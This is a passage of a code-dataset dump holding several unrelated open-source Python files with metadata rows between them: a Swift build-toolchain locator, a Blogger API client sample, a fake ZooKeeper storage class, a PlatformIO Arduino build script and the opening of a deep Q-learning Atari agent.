| mpl-2.0 | 5,802,402,802,947,574,000 | 26.708861 | 117 | 0.586341 | false |
therealbnut/swift | utils/swift_build_support/swift_build_support/toolchain.py | 4 | 5948 | # swift_build_support/toolchain.py ------------------------------*- python -*-
#
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
#
# ----------------------------------------------------------------------------
"""
Represent toolchain - the versioned executables.
"""
# ----------------------------------------------------------------------------
from __future__ import absolute_import
import platform
from . import cache_util
from . import shell
from . import xcrun
from .which import which
__all__ = [
'host_toolchain',
]
class Toolchain(object):
"""Represents native host toolchain
"""
def find_tool(self, *names):
raise NotImplementedError('Subclasses must implement this method')
# Declare properties for each tools.
# These properties are loaded lazily and assignable.
def _register(name, *tool):
def _getter(self):
return self.find_tool(*tool)
_getter.__name__ = name
setattr(Toolchain, name, cache_util.reify(_getter))
_register("cc", "clang")
_register("cxx", "clang++")
_register("ninja", "ninja", "ninja-build")
_register("cmake", "cmake")
_register("distcc", "distcc")
_register("distcc_pump", "distcc-pump", "pump")
_register("llvm_profdata", "llvm-profdata")
_register("llvm_cov", "llvm-cov")
class Darwin(Toolchain):
def __init__(self, sdk, toolchain):
super(Darwin, self).__init__()
self.xcrun_sdk = sdk
self.xcrun_toolchain = toolchain
def find_tool(self, *names):
for name in names:
# NOTE: xcrun searches from developer tools directory *and* from
# PATH. Relatively slow, but we don't need `which` for
# Darwin.
found = xcrun.find(name,
sdk=self.xcrun_sdk,
toolchain=self.xcrun_toolchain)
if found is not None:
return found
return None
class GenericUnix(Toolchain):
def __init__(self, suffixes):
super(GenericUnix, self).__init__()
# On these platforms, search 'clang', 'clang++' unconditionally.
# To determine the llvm_suffix.
ret = self.find_clang(['clang', 'clang++'], suffixes)
if ret is None:
self.cc = None
self.cxx = None
# We don't have clang, then we don't have any llvm tools.
self.llvm_suffixes = []
else:
found, suffix = ret
self.cc, self.cxx = found
if suffix == '':
# Some platform may have `clang`, `clang++`, `llvm-cov-3.6`
# but not `llvm-cov`. In that case, we assume `clang` is
# corresponding to the best version of llvm tools found.
self.llvm_suffixes = suffixes
else:
# Otherwise, we must have llvm tools with the same suffix as
# `clang` or `clang++`
self.llvm_suffixes = [suffix]
def find_clang(self, tools, suffixes):
for suffix in suffixes:
ret = [which(t + suffix) for t in tools]
if all(t is not None for t in ret):
return (ret, suffix)
return None
def find_llvm_tool(self, tool):
for suffix in self.llvm_suffixes:
found = which(tool + suffix)
if found is not None:
# If we found the tool with the suffix, lock suffixes to it.
self.llvm_suffix = [suffix]
return found
return None
def find_tool(self, *names):
for name in names:
if name.startswith('llvm-'):
found = self.find_llvm_tool(name)
else:
found = which(name)
if found is not None:
return found
return None
class MacOSX(Darwin):
def __init__(self, toolchain='default'):
super(MacOSX, self).__init__(sdk='macosx', toolchain=toolchain)
class Linux(GenericUnix):
def __init__(self):
super(Linux, self).__init__(['', '-3.8', '-3.7', '-3.6', '-3.5'])
class FreeBSD(GenericUnix):
def __init__(self):
# For testing toolchain initializer on non-FreeBSD systems
sys = platform.system()
if sys != 'FreeBSD':
suffixes = ['']
# See: https://github.com/apple/swift/pull/169
# Building Swift from source requires a recent version of the Clang
# compiler with C++14 support.
elif self._release_date and self._release_date >= 1100000:
suffixes = ['']
else:
suffixes = ['38', '37', '36', '35']
super(FreeBSD, self).__init__(suffixes)
@cache_util.reify
def _release_date(self):
"""Return the release date for FreeBSD operating system on this host.
If the release date cannot be ascertained, return None.
"""
# For details on `sysctl`, see:
# http://www.freebsd.org/cgi/man.cgi?sysctl(8)
out = shell.capture(['sysctl', '-n', 'kern.osreldate'],
dry_run=False, echo=False, optional=True)
if out is None:
return None
return int(out)
class Cygwin(Linux):
# Currently, Cygwin is considered as the same as Linux.
pass
def host_toolchain(**kwargs):
sys = platform.system()
if sys == 'Darwin':
return MacOSX(kwargs.pop('xcrun_toolchain', 'default'))
elif sys == 'Linux':
return Linux()
elif sys == 'FreeBSD':
return FreeBSD()
elif sys.startswith('CYGWIN'):
return Cygwin()
else:
raise NotImplementedError(
'toolchain() is not supported in this platform')
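# Typical use (illustrative): toolchain = host_toolchain(xcrun_toolchain='default')
# picks the subclass matching the running OS; attributes such as toolchain.cc,
# toolchain.cxx or toolchain.cmake then lazily locate the corresponding
# executables and cache the result.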
| apache-2.0 | 2,413,251,762,167,321,000 | 31.326087 | 78 | 0.559011 | false |
ActiveState/code | recipes/Python/576441_modificatiblogger_exemple_adding/recipe-576441.py | 1 | 11672 | #!/usr/bin/python
#
# Copyright (C) 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file demonstrates how to use the Google Data API's Python client library
# to interface with the Blogger service. There are examples for the following
# operations:
#
# * Retrieving the list of all the user's blogs
# * Retrieving all posts on a single blog
# * Performing a date-range query for posts on a blog
# * Creating draft posts and publishing posts
# * Updating posts
# * Retrieving comments
# * Creating comments
# * Deleting comments
# * Deleting posts
#Modified by bussiere @at gmail.com
__author__ = '[email protected] (Luke Keppler)'
from gdata import service
import gdata
import atom
import getopt
import sys
class BloggerExample:
def __init__(self, email, password):
"""Creates a GDataService and provides ClientLogin auth details to it.
The email and password are required arguments for ClientLogin. The
'source' defined below is an arbitrary string, but should be used to
reference your name or the name of your organization, the app name and
version, with '-' between each of the three values."""
# Authenticate using ClientLogin.
self.service = service.GDataService(email, password)
self.service.source = 'Blogger_Python_Sample-1.0'
self.service.service = 'blogger'
self.service.server = 'www.blogger.com'
self.service.ProgrammaticLogin()
# Get the blog ID for the first blog.
feed = self.service.Get('/feeds/default/blogs')
self_link = feed.entry[0].GetSelfLink()
if self_link:
self.blog_id = self_link.href.split('/')[-1]
def PrintUserBlogTitles(self):
"""Prints a list of all the user's blogs."""
# Request the feed.
query = service.Query()
query.feed = '/feeds/default/blogs'
feed = self.service.Get(query.ToUri())
# Print the results.
print feed.title.text
for entry in feed.entry:
print "\t" + entry.title.text
print
  def CreatePost(self, title, content, author_name, tags, is_draft):
"""This method creates a new post on a blog. The new post can be stored as
a draft or published based on the value of the is_draft parameter. The
method creates an GDataEntry for the new post using the title, content,
author_name and is_draft parameters. With is_draft, True saves the post as
a draft, while False publishes the post. Then it uses the given
GDataService to insert the new post. If the insertion is successful, the
added post (GDataEntry) will be returned.
"""
# Create the entry to insert.
entry = gdata.GDataEntry()
entry.author.append(atom.Author(atom.Name(text=author_name)))
entry.title = atom.Title(title_type='xhtml', text=title)
entry.content = atom.Content(content_type='html', text=content)
for tag in tags :
category = atom.Category(term=tag, scheme="http://www.blogger.com/atom/ns#")
entry.category.append(category)
if is_draft:
control = atom.Control()
control.draft = atom.Draft(text='yes')
entry.control = control
# Ask the service to insert the new entry.
return self.service.Post(entry,
'/feeds/' + self.blog_id + '/posts/default')
def PrintAllPosts(self):
"""This method displays the titles of all the posts in a blog. First it
requests the posts feed for the blogs and then it prints the results.
"""
# Request the feed.
feed = self.service.GetFeed('/feeds/' + self.blog_id + '/posts/default')
# Print the results.
print feed.title.text
for entry in feed.entry:
if not entry.title.text:
print "\tNo Title"
else:
print "\t" + entry.title.text
print
def PrintPostsInDateRange(self, start_time, end_time):
"""This method displays the title and modification time for any posts that
have been created or updated in the period between the start_time and
end_time parameters. The method creates the query, submits it to the
GDataService, and then displays the results.
Note that while the start_time is inclusive, the end_time is exclusive, so
specifying an end_time of '2007-07-01' will include those posts up until
2007-6-30 11:59:59PM.
The start_time specifies the beginning of the search period (inclusive),
while end_time specifies the end of the search period (exclusive).
"""
# Create query and submit a request.
query = service.Query()
query.feed = '/feeds/' + self.blog_id + '/posts/default'
query.updated_min = start_time
query.updated_max = end_time
query.orderby = 'updated'
feed = self.service.Get(query.ToUri())
# Print the results.
print feed.title.text + " posts between " + start_time + " and " + end_time
print feed.title.text
for entry in feed.entry:
if not entry.title.text:
print "\tNo Title"
else:
print "\t" + entry.title.text
print
def UpdatePostTitle(self, entry_to_update, new_title):
"""This method updates the title of the given post. The GDataEntry object
is updated with the new title, then a request is sent to the GDataService.
If the insertion is successful, the updated post will be returned.
Note that other characteristics of the post can also be modified by
updating the values of the entry object before submitting the request.
    The entry_to_update is a GDataEntry containing the post to update.
The new_title is the text to use for the post's new title. Returns: a
GDataEntry containing the newly-updated post.
"""
# Set the new title in the Entry object
entry_to_update.title = atom.Title('xhtml', new_title)
# Grab the edit URI
edit_uri = entry_to_update.GetEditLink().href
return self.service.Put(entry_to_update, edit_uri)
def CreateComment(self, post_id, comment_text):
"""This method adds a comment to the specified post. First the comment
feed's URI is built using the given post ID. Then a GDataEntry is created
for the comment and submitted to the GDataService. The post_id is the ID
of the post on which to post comments. The comment_text is the text of the
comment to store. Returns: an entry containing the newly-created comment
NOTE: This functionality is not officially supported yet.
"""
# Build the comment feed URI
feed_uri = '/feeds/' + self.blog_id + '/' + post_id + '/comments/default'
# Create a new entry for the comment and submit it to the GDataService
entry = gdata.GDataEntry()
entry.content = atom.Content(content_type='xhtml', text=comment_text)
return self.service.Post(entry, feed_uri)
def PrintAllComments(self, post_id):
"""This method displays all the comments for the given post. First the
comment feed's URI is built using the given post ID. Then the method
requests the comments feed and displays the results. Takes the post_id
of the post on which to view comments.
"""
# Build comment feed URI and request comments on the specified post
feed_url = '/feeds/' + self.blog_id + '/comments/default'
feed = self.service.Get(feed_url)
# Display the results
print feed.title.text
for entry in feed.entry:
print "\t" + entry.title.text
print "\t" + entry.updated.text
print
def DeleteComment(self, post_id, comment_id):
"""This method removes the comment specified by the given edit_link_href, the
URI for editing the comment.
"""
feed_uri = '/feeds/' + self.blog_id + '/' + post_id + '/comments/default/' + comment_id
self.service.Delete(feed_uri)
def DeletePost(self, edit_link_href):
"""This method removes the post specified by the given edit_link_href, the
URI for editing the post.
"""
self.service.Delete(edit_link_href)
def run(self):
"""Runs each of the example methods defined above, demonstrating how to
interface with the Blogger service.
"""
# Demonstrate retrieving a list of the user's blogs.
self.PrintUserBlogTitles()
# Demonstrate how to create a draft post.
    draft_post = self.CreatePost("Snorkling in Aruba",
                                 "<p>We had <b>so</b> much fun snorkling in Aruba<p>",
                                 "Post author", [], True)
print "Successfully created draft post: \"" + draft_post.title.text + "\".\n"
# Demonstrate how to publish a public post.
    public_post = self.CreatePost("Back from vacation",
                                  "<p>I didn't want to leave Aruba, but I ran out of money :(<p>",
                                  "Post author", [], False)
print "Successfully created public post: \"" + public_post.title.text + "\".\n"
# Demonstrate various feed queries.
print "Now listing all posts."
self.PrintAllPosts()
print "Now listing all posts between 2007-04-04 and 2007-04-23."
self.PrintPostsInDateRange("2007-04-04", "2007-04-23")
# Demonstrate updating a post's title.
print "Now updating the title of the post we just created:"
public_post = self.UpdatePostTitle(public_post, "The party's over")
print "Successfully changed the post's title to \"" + public_post.title.text + "\".\n"
# Demonstrate how to retrieve the comments for a post.
# Get the post ID and build the comments feed URI for the specified post
self_id = public_post.id.text
tokens = self_id.split("-")
post_id = tokens[-1]
print "Now posting a comment on the post titled: \"" + public_post.title.text + "\"."
comment = self.CreateComment(post_id, "Did you see any sharks?")
print "Successfully posted \"" + comment.content.text + "\" on the post titled: \"" + public_post.title.text + "\".\n"
comment_id = comment.GetEditLink().href.split("/")[-1]
print "Now printing all comments"
self.PrintAllComments(post_id)
# Delete the comment we just posted
print "Now deleting the comment we just posted"
self.DeleteComment(post_id, comment_id)
print "Successfully deleted comment."
self.PrintAllComments(post_id)
# Get the post's edit URI
edit_uri = public_post.GetEditLink().href
# Demonstrate deleting posts.
print "Now deleting the post titled: \"" + public_post.title.text + "\"."
self.DeletePost(edit_uri)
print "Successfully deleted post."
self.PrintAllPosts()
def main():
"""The main function runs the BloggerExample application with the provided
username and password values. Authentication credentials are required.
NOTE: It is recommended that you run this sample using a test account."""
# parse command line options
try:
opts, args = getopt.getopt(sys.argv[1:], "", ["email=", "password="])
except getopt.error, msg:
print ('python BloggerExample.py --email [email] --password [password] ')
sys.exit(2)
email = ''
password = ''
# Process options
for o, a in opts:
if o == "--email":
email = a
elif o == "--password":
password = a
if email == '' or password == '':
print ('python BloggerExample.py --email [email] --password [password]')
sys.exit(2)
sample = BloggerExample(email, password)
sample.run()
if __name__ == '__main__':
main()
| mit | 5,251,647,294,224,849,000 | 35.136223 | 122 | 0.680946 | false |
harlowja/Zake | zake/fake_storage.py | 2 | 10514 | # -*- coding: utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (C) 2013 Yahoo! Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import itertools
import os
import sys
import six
from zake import utils
from kazoo import exceptions as k_exceptions
from kazoo.protocol import states as k_states
# See: https://issues.apache.org/jira/browse/ZOOKEEPER-243
SEQ_ROLLOVER = 2147483647
SEQ_ROLLOVER_TO = -2147483647
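# As a hypothetical illustration, the first sequential child created under
# "/foo/bar-" by FakeStorage.create() below gets the zero-padded path
# "/foo/bar-0000000000", and the per-parent counter wraps from SEQ_ROLLOVER
# to SEQ_ROLLOVER_TO.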
ROOT_PATH = '/'
class FakeStorage(object):
"""A place too place fake zookeeper paths + data + connected clients."""
def __init__(self, handler, paths=None, sequences=None):
if paths:
self._paths = dict(paths)
else:
self._paths = {}
if sequences:
self._sequences = dict(sequences)
else:
self._sequences = {}
self._lock = handler.rlock_object()
# Ensure the root path *always* exists.
if ROOT_PATH not in self._paths:
self._paths[ROOT_PATH] = {
'created_on': 0,
'updated_on': 0,
'version': 0,
# Not supported for now...
'aversion': -1,
'cversion': -1,
'data': b"",
'ephemeral': False,
}
self._clients = set()
self._client_lock = handler.rlock_object()
@property
def lock(self):
return self._lock
def attach(self, client):
with self._client_lock:
if client not in self._clients:
self._clients.add(client)
def _make_znode(self, node, child_count):
# Not exactly right, but good enough...
translated = {
'czxid': node['version'],
'mzxid': node['version'],
'pzxid': node['version'],
'ctime': node['created_on'],
'mtime': node['updated_on'],
'version': node['version'],
'aversion': node['aversion'],
'cversion': node['cversion'],
'dataLength': len(node['data']),
'numChildren': int(child_count),
}
if node['ephemeral']:
translated['ephemeralOwner'] = node['ephemeral_owner']
else:
translated['ephemeralOwner'] = 0
return k_states.ZnodeStat(**translated)
@property
def paths(self):
return self._paths
@property
def sequences(self):
return self._sequences
@property
def clients(self):
return self._clients
def __getitem__(self, path):
return self._paths[path]
def __setitem__(self, path, value):
with self.lock:
self._paths[path] = value
def set(self, path, value, version=-1):
with self.lock:
if version != -1:
stat = self.get(path)[1]
if stat.version != version:
raise k_exceptions.BadVersionError("Version mismatch %s "
"!= %s" % (stat.version,
version))
self._paths[path]['data'] = value
self._paths[path]['updated_on'] = utils.millitime()
self._paths[path]['version'] += 1
else:
self._paths[path]['data'] = value
self._paths[path]['updated_on'] = utils.millitime()
self._paths[path]['version'] += 1
return self.get(path)[1]
def purge(self, client):
if not client.session_id:
return 0
with self._client_lock:
if client in self._clients:
self._clients.discard(client)
else:
return 0
removals = []
with self.lock:
for path, data in six.iteritems(self._paths):
if data['ephemeral'] \
and data['ephemeral_owner'] == client.session_id:
removals.append(path)
data_watches = []
for path in removals:
event = k_states.WatchedEvent(
type=k_states.EventType.DELETED,
state=k_states.KeeperState.CONNECTED,
path=path)
data_watches.append(([path], event))
fire_paths = []
for path in removals:
parents = sorted(six.iterkeys(self.get_parents(path)))
for parent_path in parents:
if parent_path in fire_paths:
continue
fire_paths.append(parent_path)
child_watches = []
for path in fire_paths:
event = k_states.WatchedEvent(
type=k_states.EventType.DELETED,
state=k_states.KeeperState.CONNECTED,
path=path)
child_watches.append(([path], event))
for path in removals:
del self._paths[path]
self.inform(client, child_watches, data_watches, inform_self=False)
return len(removals)
def inform(self, client, child_watches, data_watches, inform_self=True):
with self._client_lock:
clients = self._clients.copy()
for other_client in clients:
if not inform_self and other_client is client:
continue
other_client.fire_child_watches(child_watches)
other_client.fire_data_watches(data_watches)
def create(self, path, value=b"", sequence=False,
ephemeral=False, session_id=None):
def sequence_iter(path, parent_path):
for i in itertools.count(0):
sequence_id = self._sequences.get(parent_path, 0)
if sequence_id == SEQ_ROLLOVER:
self._sequences[parent_path] = SEQ_ROLLOVER_TO
else:
self._sequences[parent_path] = sequence_id + 1
yield path + '%010d' % (sequence_id)
parent_path, _node_name = os.path.split(path)
with self.lock:
if sequence:
for possible_path in sequence_iter(path, parent_path):
if possible_path not in self:
path = possible_path
break
parents = sorted(six.iterkeys(self.get_parents(path)))
if parent_path not in self:
if sequence:
self._sequences.pop(parent_path, None)
raise k_exceptions.NoNodeError("Parent node %s does not exist"
% (parent_path))
if ephemeral and not session_id:
raise k_exceptions.SystemZookeeperError("Ephemeral node %s can"
" not be created"
" without a session"
" id" % path)
if path in self:
raise k_exceptions.NodeExistsError("Node %s already"
" exists" % (path))
for parent_path in reversed(parents):
if self._paths[parent_path]['ephemeral']:
raise k_exceptions.NoChildrenForEphemeralsError(
"Parent %s is ephemeral" % parent_path)
path_data = {
# Kazoo clients expect in milliseconds
'created_on': utils.millitime(),
'updated_on': utils.millitime(),
'version': 0,
# Not supported for now...
'aversion': -1,
'cversion': -1,
'data': value,
}
if ephemeral:
path_data['ephemeral_owner'] = session_id
path_data['ephemeral'] = True
else:
path_data['ephemeral'] = False
self._paths[path] = path_data
return (True, parents, path)
def pop(self, path):
if path == ROOT_PATH:
raise k_exceptions.BadArgumentsError("Can not delete %s"
% ROOT_PATH)
with self.lock:
self._paths.pop(path)
def get(self, path):
with self.lock:
node = self._paths[path]
children_count = len(self.get_children(path))
return (node['data'], self._make_znode(node, children_count))
def __contains__(self, path):
return path in self._paths
@contextlib.contextmanager
def transaction(self):
with self.lock:
# Keep the before the transaction information and reset to that
# data if the context manager fails (this makes it appear that the
# operations done during the transaction either complete as a
# group or do not complete).
paths = self._paths.copy()
sequences = self._sequences.copy()
try:
yield
except Exception:
cause = sys.exc_info()
try:
self._paths = paths
self._sequences = sequences
finally:
six.reraise(*cause)
def get_children(self, path, only_direct=True):
paths = {}
with self.lock:
for (other_path, data) in list(six.iteritems(self._paths)):
if utils.is_child_path(path, other_path,
only_direct=only_direct):
paths[other_path] = data
return paths
def get_parents(self, path):
paths = {}
with self.lock:
for (other_path, data) in list(six.iteritems(self._paths)):
if utils.is_child_path(other_path, path, only_direct=False):
paths[other_path] = data
return paths
| apache-2.0 | -179,977,517,755,504,350 | 35.891228 | 79 | 0.509701 | false |
bq/bitbloq-offline | app/res/web2board/linux/platformio/builder/scripts/frameworks/arduino.py | 5 | 6855 | # Copyright 2014-2015 Ivan Kravets <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Arduino
Arduino Framework allows writing cross-platform software to control
devices attached to a wide range of Arduino boards to create all
kinds of creative coding, interactive objects, spaces or physical experiences.
http://arduino.cc/en/Reference/HomePage
"""
from os import listdir, walk
from os.path import isdir, isfile, join
from SCons.Script import DefaultEnvironment
import sys
env = DefaultEnvironment()
BOARD_OPTS = env.get("BOARD_OPTIONS", {})
BOARD_BUILDOPTS = BOARD_OPTS.get("build", {})
BOARD_CORELIBDIRNAME = BOARD_BUILDOPTS.get("core")
#
# Determine framework directory
# based on development platform
#
PLATFORMFW_DIR = join("$PIOPACKAGES_DIR",
"framework-arduino${PLATFORM.replace('atmel', '')}")
if "digispark" in BOARD_BUILDOPTS.get("core"):
BOARD_CORELIBDIRNAME = "digispark"
PLATFORMFW_DIR = join(
"$PIOPACKAGES_DIR",
"framework-arduino%s" % (
"sam" if BOARD_BUILDOPTS.get("cpu") == "cortex-m3" else "avr")
)
elif env.get("PLATFORM") == "timsp430":
PLATFORMFW_DIR = join(
"$PIOPACKAGES_DIR",
"framework-arduinomsp430"
)
elif env.get("PLATFORM") == "espressif":
env.Prepend(
CPPPATH=[join("$PLATFORMFW_DIR", "tools", "sdk", "include")],
LIBPATH=[join("$PLATFORMFW_DIR", "tools", "sdk", "lib")],
LIBS=["smartconfig", "pp", "main", "wpa", "lwip",
"net80211", "wps", "crypto", "phy", "hal", "axtls", "gcc", "m"]
)
env.Replace(PLATFORMFW_DIR=PLATFORMFW_DIR)
#
# Lookup for specific core's libraries
#
if isdir(join(env.subst("$PLATFORMFW_DIR"), "libraries", "__cores__", str(BOARD_CORELIBDIRNAME))): # [JORGE GARCIA] changed for non ascii chars
lib_dirs = env.get("LIBSOURCE_DIRS")
lib_dirs.insert(
lib_dirs.index(join("$PLATFORMFW_DIR", "libraries")),
join(PLATFORMFW_DIR, "libraries", "__cores__", BOARD_CORELIBDIRNAME)
)
env.Replace(
LIBSOURCE_DIRS=lib_dirs
)
#
# Base
#
ARDUINO_VERSION = int(
open(join(env.subst("$PLATFORMFW_DIR"),
"version.txt")).read().replace(".", "").strip())
# usb flags
ARDUINO_USBDEFINES = []
if "usb_product" in BOARD_BUILDOPTS:
ARDUINO_USBDEFINES = [
"USB_VID=${BOARD_OPTIONS['build']['vid']}",
"USB_PID=${BOARD_OPTIONS['build']['pid']}",
'USB_PRODUCT=\\"%s\\"' % (env.subst(
"${BOARD_OPTIONS['build']['usb_product']}").replace('"', ""))
]
if env.get("PLATFORM") == "teensy":
ARDUINO_USBDEFINES += [
"ARDUINO=10600",
"TEENSYDUINO=%d" % ARDUINO_VERSION
]
else:
ARDUINO_USBDEFINES += ["ARDUINO=%d" % ARDUINO_VERSION]
env.Append(
CPPDEFINES=ARDUINO_USBDEFINES,
CPPPATH=[
join("$BUILD_DIR", "FrameworkArduino")
]
)
#
# Atmel SAM platform
#
if env.subst("${PLATFORMFW_DIR}")[-3:] == "sam":
env.VariantDirWrap(
join("$BUILD_DIR", "FrameworkCMSISInc"),
join("$PLATFORMFW_DIR", "system", "CMSIS", "CMSIS", "Include")
)
env.VariantDirWrap(
join("$BUILD_DIR", "FrameworkDeviceInc"),
join("$PLATFORMFW_DIR", "system", "CMSIS", "Device", "ATMEL")
)
env.VariantDirWrap(
join("$BUILD_DIR", "FrameworkLibSam"),
join("$PLATFORMFW_DIR", "system", "libsam")
)
env.VariantDirWrap(
join("$BUILD_DIR", "FrameworkArduinoInc"),
join("$PLATFORMFW_DIR", "cores", "${BOARD_OPTIONS['build']['core']}")
)
env.Append(
CPPPATH=[
join("$BUILD_DIR", "FrameworkCMSISInc"),
join("$BUILD_DIR", "FrameworkLibSam"),
join("$BUILD_DIR", "FrameworkLibSam", "include"),
join("$BUILD_DIR", "FrameworkDeviceInc"),
join("$BUILD_DIR", "FrameworkDeviceInc", "sam3xa", "include")
]
)
# search relative includes in lib SAM directories
core_dir = join(env.subst("$PLATFORMFW_DIR"), "system", "libsam")
for root, _, files in walk(core_dir):
for lib_file in files:
file_path = join(root, lib_file)
if not isfile(file_path):
continue
content = None
content_changed = False
with open(file_path) as fp:
content = fp.read()
if '#include "../' in content:
content_changed = True
content = content.replace('#include "../', '#include "')
if not content_changed:
continue
with open(file_path, "w") as fp:
fp.write(content)
#
# Teensy platform
#
# Teensy 2.x Core
if BOARD_BUILDOPTS.get("core", None) == "teensy":
# search relative includes in teensy directories
core_dir = join(env.get("PIOHOME_DIR"), "packages",
"framework-arduinoteensy", "cores", "teensy")
for item in sorted(listdir(core_dir)):
file_path = join(core_dir, item)
if not isfile(file_path):
continue
content = None
content_changed = False
with open(file_path) as fp:
content = fp.read()
if '#include "../' in content:
content_changed = True
content = content.replace('#include "../', '#include "')
if not content_changed:
continue
with open(file_path, "w") as fp:
fp.write(content)
#
# Target: Build Core Library
#
libs = []
if "variant" in BOARD_BUILDOPTS:
env.Append(
CPPPATH=[
join("$BUILD_DIR", "FrameworkArduinoVariant")
]
)
libs.append(env.BuildLibrary(
join("$BUILD_DIR", "FrameworkArduinoVariant"),
join("$PLATFORMFW_DIR", "variants",
"${BOARD_OPTIONS['build']['variant']}")
))
envsafe = env.Clone()
libs.append(envsafe.BuildLibrary(
join("$BUILD_DIR", "FrameworkArduino"),
join("$PLATFORMFW_DIR", "cores", "${BOARD_OPTIONS['build']['core']}")
))
if env.subst("${PLATFORMFW_DIR}")[-3:] == "sam":
env.Append(
LIBPATH=[
join("$PLATFORMFW_DIR", "variants",
"${BOARD_OPTIONS['build']['variant']}")
]
)
envsafe.Append(
CFLAGS=[
"-std=gnu99"
]
)
libs.append("sam_sam3x8e_gcc_rel")
env.Append(LIBS=libs)
| gpl-3.0 | 4,259,678,504,592,114,700 | 29.065789 | 143 | 0.59008 | false |
aaannndddyyy/deep_q_rl | deep_q_rl/rl_glue_ale_agent.py | 3 | 16387 | """
This uses the skeleton_agent.py file from the Python-codec of rl-glue
as a starting point.
Author: Nathan Sprague
"""
#
# Copyright (C) 2008, Brian Tanner
#
#http://rl-glue-ext.googlecode.com/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import os
import cPickle
from rlglue.agent.Agent import Agent
from rlglue.agent import AgentLoader as AgentLoader
from rlglue.types import Action
from rlglue.types import Observation
from rlglue.utils import TaskSpecVRLGLUE3
import time
import logging
import random
import numpy as np
import cv2
import argparse
import matplotlib.pyplot as plt
import ale_data_set
import theano
from q_network import DeepQLearner
import sys
sys.setrecursionlimit(10000)
floatX = theano.config.floatX
IMAGE_WIDTH = 160
IMAGE_HEIGHT = 210
CROPPED_WIDTH = 84
CROPPED_HEIGHT = 84
# Number of rows to crop off the bottom of the (downsampled) screen.
# This is appropriate for breakout, but it may need to be modified
# for other games.
CROP_OFFSET = 8
class NeuralAgent(Agent):
randGenerator=random.Random()
def __init__(self, discount, learning_rate, rms_decay, rms_epsilon,
momentum, epsilon_start, epsilon_min, epsilon_decay,
phi_length, replay_memory_size, exp_pref, nn_file,
pause, network_type, update_rule, batch_accumulator,
freeze_interval, batch_size, replay_start_size,
update_frequency, image_resize):
self.discount = discount
self.learning_rate = learning_rate
self.rms_decay = rms_decay
self.rms_epsilon = rms_epsilon
self.momentum = momentum
self.epsilon_start = epsilon_start
self.epsilon_min = epsilon_min
self.epsilon_decay = epsilon_decay
self.phi_length = phi_length
self.replay_memory_size = replay_memory_size
self.exp_pref = exp_pref
self.nn_file = nn_file
self.pause = pause
self.network_type = network_type
self.update_rule = update_rule
self.batch_accumulator = batch_accumulator
self.freeze_interval = freeze_interval
self.batch_size = batch_size
self.replay_start_size = replay_start_size
self.update_frequency = update_frequency
self.image_resize = image_resize
# CREATE A FOLDER TO HOLD RESULTS
time_str = time.strftime("_%m-%d-%H-%M_", time.gmtime())
self.exp_dir = self.exp_pref + time_str + \
"{}".format(self.learning_rate).replace(".", "p") + \
"_" + "{}".format(self.discount).replace(".", "p")
try:
os.stat(self.exp_dir)
except:
os.makedirs(self.exp_dir)
def agent_init(self, task_spec_string):
"""
This function is called once at the beginning of an experiment.
Arguments: task_spec_string - A string defining the task. This string
is decoded using
TaskSpecVRLGLUE3.TaskSpecParser
"""
# DO SOME SANITY CHECKING ON THE TASKSPEC
TaskSpec = TaskSpecVRLGLUE3.TaskSpecParser(task_spec_string)
if TaskSpec.valid:
assert ((len(TaskSpec.getIntObservations()) == 0) !=
(len(TaskSpec.getDoubleObservations()) == 0)), \
"expecting continous or discrete observations. Not both."
assert len(TaskSpec.getDoubleActions()) == 0, \
"expecting no continuous actions"
assert not TaskSpec.isSpecial(TaskSpec.getIntActions()[0][0]), \
" expecting min action to be a number not a special value"
assert not TaskSpec.isSpecial(TaskSpec.getIntActions()[0][1]), \
" expecting max action to be a number not a special value"
self.num_actions = TaskSpec.getIntActions()[0][1]+1
else:
logging.error("INVALID TASK SPEC")
self.data_set = ale_data_set.DataSet(width=CROPPED_WIDTH,
height=CROPPED_HEIGHT,
max_steps=self.replay_memory_size,
phi_length=self.phi_length)
# just needs to be big enough to create phi's
self.test_data_set = ale_data_set.DataSet(width=CROPPED_WIDTH,
height=CROPPED_HEIGHT,
max_steps=10,
phi_length=self.phi_length)
self.epsilon = self.epsilon_start
if self.epsilon_decay != 0:
self.epsilon_rate = ((self.epsilon_start - self.epsilon_min) /
self.epsilon_decay)
else:
self.epsilon_rate = 0
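        # For example, with epsilon_start=1.0, epsilon_min=0.1 and
        # epsilon_decay=1000000 (hypothetical settings), epsilon shrinks by
        # 9e-7 per training step until it reaches epsilon_min.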
#self.target_reset_freq = 10000 # target network update frequency
self.testing = False
if self.nn_file is None:
self.network = self._init_network()
else:
handle = open(self.nn_file, 'r')
self.network = cPickle.load(handle)
self._open_results_file()
self._open_learning_file()
self.episode_counter = 0
